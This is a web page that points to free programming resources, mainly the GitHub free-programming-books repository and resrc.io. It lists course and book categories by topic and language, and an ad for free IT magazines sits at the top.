Browse through our extensive list of free Information Technology magazines, white papers, downloads and podcasts to find the titles that best match your skills; topics include technology, IT management, business technology and e-business. Simply complete the application form and submit it. All are absolutely free to professionals who qualify.

http://cybrary-it.tradepub.com

List of Free Learning Resources


Intro:
If you want to find a learning resource, you should definitely check out our site, Free Learning Resources (http://resrc.io). And for those who want to learn a computer language, you should check out these books on reSRC.io (http://resrc.io/list/10/list-of-free-programming-books) or on github (https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md). This list initially was a clone of stackoverflow – List of Freely Available Programming Books (http://stackoverflow.com/questions/194812/list-of-freely-available-programming-books/392926#392926) by George Stocker. Now updated, with dead links gone and new content.

Moved to GitHub for collaborative updating and for the site mentioned above.
NEW : Search inside free-programming-books.md (and a whole lot more of learning resources) Try it out at http://resrc.io/search

Free Courses (https://github.com/vhf/free-programming-books/blob/master/free-courses-en.md):

Assembly

Android

AngularJS

C

C++

Clojure

Databases

Haskell

HTML / CSS

iOS

Java

JS

MATLAB

Misc

OCaml

Oracle PL/SQL

Python

Ruby

Scala

Swift

Web Development

Free Podscasts and Screencasts (https://github.com/vhf/free-programming-books/blob/master/free-podcasts-screencasts-en.md):

Free Programming books (https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md):
Original Contribution by George Stocker on Stack Overflow
Original Source: Free Programming books

Meta Lists

Graphics Programming

Graphical User Interfaces

Language Agnostic

Algorithms & Data Structures

Cellular Automata

Cloud Computing

Compiler Design

Computer Vision

Database

Datamining

Information Retrieval

Licensing

Machine Learning

Mathematics

Mathematics For Computer Science

Misc

MOOC

Networking

Open Source Ecosystem

Operating systems

Parallel Programming

Partial Evaluation

Professional Development

Programming Paradigms

Regular Expressions

Reverse Engineering

Security

Software Architecture

Standards

Theoretical Computer Science

Web Performance

Ada

Agda

Alef

Android

APL

Arduino

ASP.NET MVC

Assembly Language

Non-X86

AutoHotkey

Autotools

Awk

Bash

Basic

BETA

C

C Sharp

C++